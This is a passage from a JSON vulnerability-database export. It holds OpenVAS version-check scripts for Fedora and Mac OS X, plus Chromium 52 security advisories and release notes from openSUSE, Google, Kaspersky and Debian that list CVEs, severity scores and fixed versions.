\"CVE-2016-5205\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5214\",\n \"CVE-2016-5215\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5224\",\n \"CVE-2016-5225\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\",\n \"CVE-2017-5006\", \"CVE-2017-5007\", \"CVE-2017-5008\", \"CVE-2017-5009\",\n \"CVE-2017-5010\", \"CVE-2017-5012\", \"CVE-2017-5015\", \"CVE-2017-5016\",\n \"CVE-2017-5017\", \"CVE-2017-5019\", \"CVE-2017-5023\", \"CVE-2017-5024\",\n \"CVE-2017-5025\", \"CVE-2017-5026\", \"CVE-2017-5027\", \"CVE-2017-5029\",\n \"CVE-2017-5033\", \"CVE-2017-5037\", \"CVE-2017-5044\", \"CVE-2017-5046\",\n \"CVE-2017-5047\", \"CVE-2017-5048\", \"CVE-2017-5049\", \"CVE-2017-5050\",\n \"CVE-2017-5051\", \"CVE-2017-5059\", \"CVE-2017-5061\", \"CVE-2017-5062\",\n \"CVE-2017-5065\", \"CVE-2017-5067\", \"CVE-2017-5069\", \"CVE-2017-5070\",\n \"CVE-2017-5071\", \"CVE-2017-5075\", \"CVE-2017-5076\", \"CVE-2016-5078\",\n \"CVE-2017-5083\", \"CVE-2017-5089\");\n script_tag(name:\"cvss_base\", 
value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for qt5-qtwebengine FEDORA-2017-98bed96d12\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'qt5-qtwebengine'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"qt5-qtwebengine on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-98bed96d12\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LV2U7SINGF3SBK7HVKSWFOYLQBUH6PUE\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"qt5-qtwebengine\", rpm:\"qt5-qtwebengine~5.6.3~0.1.20170712gitee719ad313e564.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:01", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-09-28T00:00:00", "type": "openvas", "title": "Apple Mac OS X Multiple Vulnerabilities-01 
September-2016", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4727", "CVE-2016-5771", "CVE-2016-6288", "CVE-2016-6290", "CVE-2016-4713", "CVE-2016-4750", "CVE-2016-4716", "CVE-2016-4703", "CVE-2016-5772", "CVE-2016-4722", "CVE-2016-4753", "CVE-2016-4752", "CVE-2016-4773", "CVE-2016-4694", "CVE-2016-4696", "CVE-2016-4701", "CVE-2016-0755", "CVE-2016-4715", "CVE-2016-4712", "CVE-2016-4708", "CVE-2016-4709", "CVE-2016-4748", "CVE-2016-4755", "CVE-2016-5770", "CVE-2016-5768", "CVE-2016-4717", "CVE-2016-4710", "CVE-2016-4745", "CVE-2016-4776", "CVE-2016-6174", "CVE-2016-4711", "CVE-2016-4699", "CVE-2016-6295", "CVE-2016-4697", "CVE-2016-6297", "CVE-2016-4739", "CVE-2016-6292", "CVE-2016-4698", "CVE-2016-4736", "CVE-2016-4707", "CVE-2016-5131", "CVE-2016-6289", "CVE-2016-4718", "CVE-2016-4777", "CVE-2016-4738", "CVE-2016-4723", "CVE-2016-4724", "CVE-2016-5769", "CVE-2016-6294", "CVE-2016-4725", "CVE-2016-4742", "CVE-2016-4706", "CVE-2016-5773", "CVE-2016-4772", "CVE-2016-4779", "CVE-2016-4771", "CVE-2016-4726", "CVE-2016-4658", "CVE-2016-4700", "CVE-2016-4775", "CVE-2016-6291", "CVE-2016-4774", "CVE-2016-4778", "CVE-2016-4702", "CVE-2016-6296"], "modified": "2019-05-03T00:00:00", "id": "OPENVAS:1361412562310807888", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807888", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-01 September-2016\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807888\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2016-4694\", \"CVE-2016-5768\", \"CVE-2016-5769\", \"CVE-2016-5770\",\n \"CVE-2016-5771\", \"CVE-2016-5772\", \"CVE-2016-5773\", \"CVE-2016-6174\",\n \"CVE-2016-6288\", \"CVE-2016-6289\", \"CVE-2016-6290\", \"CVE-2016-6291\",\n \"CVE-2016-6292\", \"CVE-2016-6294\", \"CVE-2016-6295\", \"CVE-2016-6296\",\n \"CVE-2016-6297\", \"CVE-2016-4697\", \"CVE-2016-4696\", \"CVE-2016-4698\",\n \"CVE-2016-4699\", \"CVE-2016-4700\", \"CVE-2016-4701\", \"CVE-2016-4779\",\n \"CVE-2016-4702\", \"CVE-2016-4703\", \"CVE-2016-4706\", \"CVE-2016-4707\",\n \"CVE-2016-4708\", \"CVE-2016-4711\", \"CVE-2016-4712\", \"CVE-2016-4713\",\n \"CVE-2016-0755\", \"CVE-2016-4715\", \"CVE-2016-4716\", \"CVE-2016-4717\",\n \"CVE-2016-4718\", \"CVE-2016-4722\", \"CVE-2016-4723\", \"CVE-2016-4724\",\n \"CVE-2016-4725\", \"CVE-2016-4726\", \"CVE-2016-4727\", \"CVE-2016-4745\",\n \"CVE-2016-4771\", \"CVE-2016-4772\", \"CVE-2016-4773\", \"CVE-2016-4774\",\n \"CVE-2016-4776\", \"CVE-2016-4775\", \"CVE-2016-4777\", \"CVE-2016-4778\",\n \"CVE-2016-4736\", \"CVE-2016-4658\", \"CVE-2016-5131\", \"CVE-2016-4738\",\n \"CVE-2016-4739\", \"CVE-2016-4742\", \"CVE-2016-4748\", \"CVE-2016-4750\",\n \"CVE-2016-4752\", \"CVE-2016-4753\", \"CVE-2016-4755\", \"CVE-2016-4709\",\n \"CVE-2016-4710\");\n script_bugtraq_id(93063, 91396, 92074, 92073, 93054, 93055, 92095, 92094, 92097,\n 93059, 92078, 92053, 91732, 91399, 91398, 91397, 92099, 82307,\n 92111, 91403, 92115, 91401, 93060, 93056);\n 
script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-09-28 12:22:55 +0530 (Wed, 28 Sep 2016)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-01 September-2016\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. For details\n refer the reference links.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code or cause a denial of service (memory corruption),\n gain access to potentially sensitive information, bypass certain protection\n mechanism and have other impacts.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions 10.7.5 through 10.11.x\n prior to 10.12\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version\n 10.12 or later. Please see the references for more information.\n\n Note: According to the vendor an upgrade to version 10.12 is required to\n mitigate this vulnerabilities. 
Please see the advisory (HT207170) for more info.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207170\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.([7-9]|1[01])\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer)\n exit(0);\n\nif(\"Mac OS X\" >< osName && osVer =~ \"^10\\.([7-9]|1[01])\"){\n if(version_in_range(version:osVer, test_version: \"10.7.5\", test_version2:\"10.11.6\")){\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"According to the vendor an upgrade to version 10.12 is required to mitigate this vulnerabilities. 
Please see the advisory (HT207170) for more info.\");\n security_message(port:0, data:report);\n exit(0);\n }\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:25:25", "description": "Chromium was updated to 52.0.2743.82 to fix the following security issues\n (boo#989901):\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n - CVE-2016-1707: URL spoofing on iOS\n - CVE-2016-1708: Use-after-free in Extensions\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n - CVE-2016-1710: Same-origin bypass in Blink\n - CVE-2016-1711: Same-origin bypass in Blink\n - CVE-2016-5127: Use-after-free in Blink\n - CVE-2016-5128: Same-origin bypass in V8\n - CVE-2016-5129: Memory corruption in V8\n - CVE-2016-5130: URL spoofing\n - CVE-2016-5131: Use-after-free in libxml\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n - CVE-2016-5133: Origin confusion in proxy authentication\n - CVE-2016-5134: URL leakage via PAC script\n - CVE-2016-5135: Content-Security-Policy bypass\n - CVE-2016-5136: Use after free in extensions\n - CVE-2016-5137: History sniffing with HSTS and CSP\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other\n initiatives\n\n", "cvss3": {}, "published": "2016-07-25T15:10:08", "type": "suse", "title": "Security update for Chromium (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2016-07-25T15:10:08", "id": "OPENSUSE-SU-2016:1868-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00021.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": 
"2016-09-04T12:29:34", "description": "Chromium was updated to 52.0.2743.82 to fix the following security issues\n (boo#989901):\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n - CVE-2016-1707: URL spoofing on iOS\n - CVE-2016-1708: Use-after-free in Extensions\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n - CVE-2016-1710: Same-origin bypass in Blink\n - CVE-2016-1711: Same-origin bypass in Blink\n - CVE-2016-5127: Use-after-free in Blink\n - CVE-2016-5128: Same-origin bypass in V8\n - CVE-2016-5129: Memory corruption in V8\n - CVE-2016-5130: URL spoofing\n - CVE-2016-5131: Use-after-free in libxml\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n - CVE-2016-5133: Origin confusion in proxy authentication\n - CVE-2016-5134: URL leakage via PAC script\n - CVE-2016-5135: Content-Security-Policy bypass\n - CVE-2016-5136: Use after free in extensions\n - CVE-2016-5137: History sniffing with HSTS and CSP\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other\n initiatives\n\n", "cvss3": {}, "published": "2016-07-31T21:08:18", "type": "suse", "title": "Security update for Chromium (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2016-07-31T21:08:18", "id": "OPENSUSE-SU-2016:1918-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00028.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:11:40", "description": "Chromium was updated to 52.0.2743.82 to fix the following security issues\n (boo#989901):\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n - CVE-2016-1707: URL spoofing on iOS\n - 
CVE-2016-1708: Use-after-free in Extensions\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n - CVE-2016-1710: Same-origin bypass in Blink\n - CVE-2016-1711: Same-origin bypass in Blink\n - CVE-2016-5127: Use-after-free in Blink\n - CVE-2016-5128: Same-origin bypass in V8\n - CVE-2016-5129: Memory corruption in V8\n - CVE-2016-5130: URL spoofing\n - CVE-2016-5131: Use-after-free in libxml\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n - CVE-2016-5133: Origin confusion in proxy authentication\n - CVE-2016-5134: URL leakage via PAC script\n - CVE-2016-5135: Content-Security-Policy bypass\n - CVE-2016-5136: Use after free in extensions\n - CVE-2016-5137: History sniffing with HSTS and CSP\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other\n initiatives\n\n", "cvss3": {}, "published": "2016-07-25T15:10:21", "type": "suse", "title": "Security update for Chromium (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2016-07-25T15:10:21", "id": "OPENSUSE-SU-2016:1869-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00022.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "chrome": [{"lastseen": "2023-06-03T20:07:01", "description": "The Chrome team is delighted to announce the promotion of Chrome 52 to the stable channel for Windows, Mac and Linux. Chrome 52.0.2743.82 contains a number of fixes and improvements -- a list of changes is available in the[ log](<https://chromium.googlesource.com/chromium/src/+log/51.0.2704.106..52.0.2743.82?pretty=fuller&n=10000>). 
Watch out for upcoming[ Chrome](<http://chrome.blogspot.com/>) and[ Chromium](<http://blog.chromium.org/>) blog posts about new features and big efforts delivered in 52. \n\n\n#### Security Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed. \n\nThis update includes [48 security fixes](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=label%3ARelease-0-M52>). Below, we highlight fixes that were contributed by external researchers. Please see the [Chromium security page](<http://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information. \n\n[$15000][[610600](<https://crbug.com/610600>)] **High** CVE-2016-1706: Sandbox escape in PPAPI. Credit to Pinkie Pie \n[$3000][[622183](<https://crbug.com/622183>)] **High** CVE-2016-1707: URL spoofing on iOS. Credit to xisigr of Tencent's Xuanwu Lab \n[$500][[613949](<https://crbug.com/613949>)] **High** CVE-2016-1708: Use-after-free in Extensions. Credit to Adam Varsan \n[$500][[614934](<https://crbug.com/614934>)] **High** CVE-2016-1709: Heap-buffer-overflow in sfntly. Credit to ChenQin of Topsec Security Team \n[$8000][[616907](<https://crbug.com/616907>)] **High** CVE-2016-1710: Same-origin bypass in Blink. Credit to Mariusz Mlynski \n[$7500][[617495](<https://crbug.com/617495>)] **High** CVE-2016-1711: Same-origin bypass in Blink. Credit to Mariusz Mlynski \n[$3000][[618237](<https://crbug.com/618237>)] **High** CVE-2016-5127: Use-after-free in Blink. Credit to cloudfuzzer \n[$7500][[619166](<https://crbug.com/619166>)] **High** CVE-2016-5128: Same-origin bypass in V8. Credit to Anonymous \n[$5000][[620553](<https://crbug.com/620553>)] **High** CVE-2016-5129: Memory corruption in V8. 
Credit to Jeonghoon Shin \n[$2000][[623319](<https://crbug.com/623319>)] **High** CVE-2016-5130: URL spoofing. Credit to Wadih Matar \n[$3500][[623378](<https://crbug.com/623378>)] **High** CVE-2016-5131: Use-after-free in libxml. Credit to Nick Wellnhofer \n[$1000][[607543](<https://crbug.com/607543>)] **Medium** CVE-2016-5132: Limited same-origin bypass in Service Workers. Credit to Ben Kelly \n[$1000][[613626](<https://crbug.com/613626>)] **Medium** CVE-2016-5133: Origin confusion in proxy authentication. Credit to Patch Eudor \n[$500][[593759](<https://crbug.com/593759>)] **Medium** CVE-2016-5134: URL leakage via PAC script. Credit to Alex Chapman and Paul Stone of Context Information Security \n[$500][[605451](<https://crbug.com/605451>)] **Medium** CVE-2016-5135: Content-Security-Policy bypass. Credit to ShenYeYinJiu of Tencent Security Response Center, TSRC \n[$1000][[625393](<https://crbug.com/625393>)] **Medium** CVE-2016-5136: Use after free in extensions. Credit to Rob Wu \n[$1000][[625945](<https://crbug.com/625945>)] **Medium** CVE-2016-5137: History sniffing with HSTS and CSP. Credit to Xiaoyin Liu \n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. \n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes: \n\n[[629852](<https://crbug.com/629852>)] CVE-2016-1705: Various fixes from internal audits, fuzzing and other initiatives. \n\nMany of our security bugs are detected using [AddressSanitizer](<http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>) or [LibFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>). 
\n\n\n\n\n\nInterested in switching release channels?[ Find out how](<http://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by[ filing a bug](<http://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues. \n\nKrishna Govind \nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-07-20T00:00:00", "type": "chrome", "title": "Stable Channel Update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2016-07-20T00:00:00", "id": "GCSA-1145367273444230144", "href": "https://chromereleases.googleblog.com/2016/07/stable-channel-update.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": 
"2023-06-03T15:31:56", "description": "### *Detect date*:\n07/20/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Google Chrome. Malicious users can exploit these vulnerabilities to cause denial of service, spoof user interface, bypass security restrictions, execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nGoogle Chrome versions earlier than 52.0.2743.82 (All branches)\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Get Google Chrome](<https://www.google.com/chrome/browser/desktop/index.html>)\n\n### *Original advisories*:\n[Google Chrome realases blog](<http://googlechromereleases.blogspot.ru/2016/07/stable-channel-update.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+GoogleChromeReleases+\\(Google+Chrome+Releases\\)>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2016-5137](<https://vulners.com/cve/CVE-2016-5137>)4.3Warning \n[CVE-2016-5136](<https://vulners.com/cve/CVE-2016-5136>)6.8High \n[CVE-2016-5135](<https://vulners.com/cve/CVE-2016-5135>)4.3Warning \n[CVE-2016-5134](<https://vulners.com/cve/CVE-2016-5134>)4.3Warning \n[CVE-2016-5133](<https://vulners.com/cve/CVE-2016-5133>)4.3Warning \n[CVE-2016-5132](<https://vulners.com/cve/CVE-2016-5132>)6.8High \n[CVE-2016-5131](<https://vulners.com/cve/CVE-2016-5131>)6.8High \n[CVE-2016-5130](<https://vulners.com/cve/CVE-2016-5130>)4.3Warning \n[CVE-2016-5129](<https://vulners.com/cve/CVE-2016-5129>)6.8High \n[CVE-2016-5128](<https://vulners.com/cve/CVE-2016-5128>)6.8High \n[CVE-2016-5127](<https://vulners.com/cve/CVE-2016-5127>)6.8High 
\n[CVE-2016-1711](<https://vulners.com/cve/CVE-2016-1711>)6.8High \n[CVE-2016-1710](<https://vulners.com/cve/CVE-2016-1710>)6.8High \n[CVE-2016-1709](<https://vulners.com/cve/CVE-2016-1709>)6.8High \n[CVE-2016-1708](<https://vulners.com/cve/CVE-2016-1708>)6.8High \n[CVE-2016-1707](<https://vulners.com/cve/CVE-2016-1707>)4.3Warning \n[CVE-2016-1706](<https://vulners.com/cve/CVE-2016-1706>)9.3Critical \n[CVE-2016-1705](<https://vulners.com/cve/CVE-2016-1705>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-07-20T00:00:00", "type": "kaspersky", "title": "KLA10846 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2020-06-03T00:00:00", "id": "KLA10846", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10846/", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-08-10T07:11:10", "description": "\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\n\n* [CVE-2016-1704](https://security-tracker.debian.org/tracker/CVE-2016-1704)\nThe chrome development team found and fixed various issues during\n internal auditing.\n* [CVE-2016-1705](https://security-tracker.debian.org/tracker/CVE-2016-1705)\nThe chrome development team found and fixed various issues during\n internal auditing.\n* [CVE-2016-1706](https://security-tracker.debian.org/tracker/CVE-2016-1706)\nPinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n* [CVE-2016-1707](https://security-tracker.debian.org/tracker/CVE-2016-1707)\nxisigr discovered a URL spoofing issue.\n* [CVE-2016-1708](https://security-tracker.debian.org/tracker/CVE-2016-1708)\nAdam Varsan discovered a use-after-free issue.\n* [CVE-2016-1709](https://security-tracker.debian.org/tracker/CVE-2016-1709)\nChenQin discovered a buffer overflow issue in the sfntly library.\n* [CVE-2016-1710](https://security-tracker.debian.org/tracker/CVE-2016-1710)\nMariusz Mlynski discovered a same-origin bypass.\n* [CVE-2016-1711](https://security-tracker.debian.org/tracker/CVE-2016-1711)\nMariusz Mlynski discovered another same-origin bypass.\n* [CVE-2016-5127](https://security-tracker.debian.org/tracker/CVE-2016-5127)\ncloudfuzzer discovered a use-after-free issue.\n* [CVE-2016-5128](https://security-tracker.debian.org/tracker/CVE-2016-5128)\nA same-origin bypass issue was discovered in the v8 javascript library.\n* [CVE-2016-5129](https://security-tracker.debian.org/tracker/CVE-2016-5129)\nJeonghoon Shin discovered a memory corruption issue in the v8 javascript\n library.\n* [CVE-2016-5130](https://security-tracker.debian.org/tracker/CVE-2016-5130)\nWidih Matar discovered a URL spoofing issue.\n* [CVE-2016-5131](https://security-tracker.debian.org/tracker/CVE-2016-5131)\nNick Wellnhofer discovered a use-after-free issue 
in the libxml2 library.\n* [CVE-2016-5132](https://security-tracker.debian.org/tracker/CVE-2016-5132)\nBen Kelly discovered a same-origin bypass.\n* [CVE-2016-5133](https://security-tracker.debian.org/tracker/CVE-2016-5133)\nPatch Eudor discovered an issue in proxy authentication.\n* [CVE-2016-5134](https://security-tracker.debian.org/tracker/CVE-2016-5134)\nPaul Stone discovered an information leak in the Proxy Auto-Config\n feature.\n* [CVE-2016-5135](https://security-tracker.debian.org/tracker/CVE-2016-5135)\nShenYeYinJiu discovered a way to bypass the Content Security Policy.\n* [CVE-2016-5136](https://security-tracker.debian.org/tracker/CVE-2016-5136)\nRob Wu discovered a use-after-free issue.\n* [CVE-2016-5137](https://security-tracker.debian.org/tracker/CVE-2016-5137)\nXiaoyin Liu discovered a way to discover whether an HSTS web site had been\n visited.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 52.0.2743.82-1~deb8u1.\n\n\nFor the testing (stretch) and unstable (sid) distributions, these problems\nhave been fixed in version 52.0.2743.82-1.\n\n\nWe recommend that you upgrade your chromium-browser packages.\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, 